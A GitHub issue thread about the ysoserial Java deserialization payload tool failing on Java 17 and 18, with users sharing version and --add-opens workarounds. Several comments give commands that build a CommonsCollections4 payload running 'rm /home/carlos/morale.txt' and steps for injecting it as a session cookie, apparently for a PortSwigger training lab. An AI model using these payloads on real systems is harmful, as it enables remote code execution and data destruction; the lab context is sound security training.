search

frohoff / ysoserial

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
http://frohoff.github.io/appseccali-marshalling-pickles/
MIT License
7.65k stars 1.74k forks source link

Ysoserial doesn't work with Java version 17 #203

Closed otium44 closed 7 months ago

otium44 commented 1 year ago

When I run Ysoserial I got these's errors :

Error while generating or serializing payload

$ java -jar ysoserial.jar CommonsCollections4 'Payload'
java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x4015e7ec) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x4015e7ec
        at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
        at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32)
        at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26)
        at ysoserial.GeneratePayload.main(GeneratePayload.java:34)

I found out that's errors happen only with Java 17. I saw some people facing the same problem online. When run it again on java 15 it worked. More Info: 

$ java --version
openjdk 17.0.6 2023-01-17
OpenJDK Runtime Environment (build 17.0.6+10-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)
ghost commented 1 year ago

Same issue with Java 18

$ java --version
openjdk 18.0.2 2022-07-19
OpenJDK Runtime Environment (build 18.0.2+10)
OpenJDK 64-Bit Server VM (build 18.0.2+10, mixed mode, sharing)
$ java -jar ysoserial.jar CommonsCollections1 calc.exe
Error while generating or serializing payload
java.lang.reflect.InaccessibleObjectException: Unable to make sun.reflect.annotation.AnnotationInvocationHandler(java.lang.Class,java.util.Map) accessible: module java.base does not "opens sun.reflect.annotation" to unnamed module @7fbd2524
    at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
    at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
    at java.base/java.lang.reflect.Constructor.checkCanSetAccessible(Constructor.java:191)
    at java.base/java.lang.reflect.Constructor.setAccessible(Constructor.java:184)
    at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:26)
    at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:55)
    at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
    at ysoserial.payloads.util.Gadgets.createMemoitizedProxy(Gadgets.java:67)
    at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:71)
    at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:43)
    at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
bountyhacking commented 1 year ago

Ok but how can i run ysoserial.jar with another version of java?

When I run Ysoserial I got these's errors :

Error while generating or serializing payload

$ java -jar ysoserial.jar CommonsCollections4 'Payload'
java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x4015e7ec) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x4015e7ec
        at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
        at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32)
        at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26)
        at ysoserial.GeneratePayload.main(GeneratePayload.java:34)

I found out that's errors happen only with Java 17. I saw some people facing the same problem online. When run it again on java 15 it worked. More Info:

$ java --version
openjdk 17.0.6 2023-01-17
OpenJDK Runtime Environment (build 17.0.6+10-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)
bountyhacking commented 1 year ago

THIS IS THE SOLUTION FOR LINUX:

This solution worked for me. Im making a (Portswigger lab) and i need this software works. Here you can find step by step how i fixed it.

  1. Install java 11 sudo apt-get install openjdk-11-jdk
  2. Add Java 11 to PATH variable. To add the Java 11 installation directory to the PATH variable, you can open the .bashrc or .bash_profile file in your home directory using a text editor. For example, you can use the following command to open the .bashrc file: nano ~/.bashrc
  3. In the open file, add the following line to the end: export PATH="/usr/lib/jvm/java-11-openjdk-amd64/bin:$PATH"
  4. Save and exit nano
  5. Restart the terminal with the following command source ~/.bashrc
  6. Execute ysoserial. Example: java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
  7. You should see the following output on the first line: Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Alternative and easy way:

sudo apt update -y sudo apt install openjdk-11-jdk sudo update-alternatives --config java java --version

otium44 commented 1 year ago

7. true

I'm also did it for port swigger lab I did it with java 15

JorianWoltjer commented 1 year ago

For anyone still wanting to use Java 17, it is possible through the --add-opens option in java. See https://github.com/frohoff/ysoserial/issues/176 for more details, with a script I made that does this automatically in a comment there

Anawak commented 1 year ago

I also stumbled over this issue while doing the Portswigger Labs. However, I didn't want to have a second java installation on my system. I found a way of making it work with Java 17 simply by shifting around the arguments of the call. On the Portswigger page, they give the following hint for Java 17 users:

java -jar ysoserial-all.jar \
   --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
   --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
   --add-opens=java.base/java.net=ALL-UNNAMED \
   --add-opens=java.base/java.util=ALL-UNNAMED \
   [payload] '[command]'

However, I still got only the normal startup prompt:

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true                                                                                                            
Y SO SERIAL?                                                                                                                                                                             
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'                                                                                                                       
  Available payload types: 
[List of payloads here]

Since it looked as if ysoserial didn't recognize the arguments correctly, I finally came up with this order, which worked fine in Kali:

java \
 --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\
 --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\
 --add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\
 -jar ./ysoserial.jar <payload> <command>

Hope this helps someone :)

Libertocrat commented 1 year ago

I also stumbled over this issue while doing the Portswigger Labs. However, I didn't want to have a second java installation on my system. I found a way of making it work with Java 17 simply by shifting around the arguments of the call. On the Portswigger page, they give the following hint for Java 17 users:

java -jar ysoserial-all.jar \
   --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
   --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
   --add-opens=java.base/java.net=ALL-UNNAMED \
   --add-opens=java.base/java.util=ALL-UNNAMED \
   [payload] '[command]'

However, I still got only the normal startup prompt:

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true                                                                                                            
Y SO SERIAL?                                                                                                                                                                             
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'                                                                                                                       
  Available payload types: 
[List of payloads here]

Since it looked as if ysoserial didn't recognize the arguments correctly, I finally came up with this order, which worked fine in Kali:

java \
 --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\
 --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\
 --add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\
 -jar ./ysoserial.jar <payload> <command>

Hope this helps someone :)

Worked like a charm for me! I used Kali Linux v2023.3 with Java v17.0.8 to solve PortSwigger's lab

Thanks for sharing, you've saved me hours of further research & testing.

PortSwigger_lab_solved

Otojon commented 11 months ago

BTW , whoever still struggling with that particular lab or ysoserial , I recommend using Java 8. Here is how it worked for me (Linux):

  1. Download Java 8 from here https://jdk.java.net/java-se-ri/8-MR5
  2. tar xvf openjdk-bla-bla-bla.tar.gz
  3. /home/user/Downloads/java-se-8u43-ri/bin/java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 > cookie.txt
  4. remove white spaces from cookie.txt file (use online tools , or you can do it manually)
  5. Pasted your cookie as wiener cookies
  6. Before sending request don't forget to URL encode all characters (with burp , choose the pasted cookie , right click , Convert selection>URL> URL encode all-characters)
  7. Send the request image

Hope it helps ;)

DOP7 commented 9 months ago

@Anawak , thanks bro, your solution worked for portswigger lab no 5, for java 17 version users: ...................................................

java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\ --add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\
-jar ./ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64

frohoff commented 7 months ago

Duplicate of #176

panjie666 commented 6 months ago

thanks bro, your solution worked for portswigger lab no 5, for java 17 version users: java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\ --add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\ -jar ./ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt'|base64 >tee.txt